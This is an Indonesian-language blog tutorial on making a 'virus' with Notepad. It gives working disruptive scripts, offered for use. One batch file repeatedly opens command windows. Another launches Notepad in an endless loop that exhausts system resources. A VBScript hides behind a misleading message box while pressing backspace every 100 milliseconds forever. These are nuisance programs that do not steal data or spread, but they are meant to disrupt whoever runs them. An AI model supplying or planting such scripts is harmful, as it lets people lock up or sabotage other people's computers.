Cara membuat virus dari notepad dengan mudah # 1

Halo semua !!!
Selamat datang di Blog sederhana Gue. Oke, kali ini gue bakalan bagi-bagi sebuah Cara untuk membuat Virus dari notepad. Bagi kalian para pengguna Komputer pasti gak asing lagi dengan yang namanya Virus. Nah sub Virus komputer merupakan program komputer yang dapat menggandakan atau menyalin dirinya sendiri dan menyebar dengan cara menyisipkan salinan dirinya ke dalam program atau dokumen lain. Virus komputer dapat dianalogikan dengan virus biologis yang menyebar dengan cara menyisipkan dirinya sendiri ke sel makhluk hidup.

1. Sekarang saya akan menjelaskan cara membuat virus menggunakan Notepad : Buka notepad nya melalui start - all programs - accessories - notepad kemudian ketik kode script berikut ke notepad : 

start

start

start

start

start

start

start

start

start

start

start

start

Nah selanjutnya simpan di dalam Notepad dengan nama apa saja dengan ekstansi .bat
Contoh: "Fuckyou.bat" tanpa tanda kutip lalu ganti Save As Type dengan All Files. Trik ini akan membuat cmd terbuka otomatis jika file "Fuckyou.bat" dijalankan.

2Masih di notepad, sekarang saya akan jelaskan cara membuat notepad terbuka secara otomatis, silahkan ketik/ copas kode script berikut ke notepad :


@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

Simpan Script diatas dengan cara yang sama dengan cara yang pertama.

3. Masih menggunakan notepad, yang sekarang cara membuat tombol backspace menjadi eror menekan terus menerus secara otomatis, langsung saja copas/ketik kode script berikut ke notepad : 

MsgBox "kembali ke menu sebelumnya"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop

Simpan kode script tersebut di notepad dengan nama apa saja yang penting tidak lupa menuliskan exstensi .vbs contoh : "eror.vbs" tanpa tanda kutip dan Save As Type ganti menjadi Al Files. Trik ini membuat tombol backspace menjadi eror dan menekan dengan sendiri nya.

Oke sekian dari saya
Apa bila ada kata-kata yang salah saya mohon maaf
Semoga bermanfaat dan sampai jumpa

Share this

Related Posts

Previous
Next Post »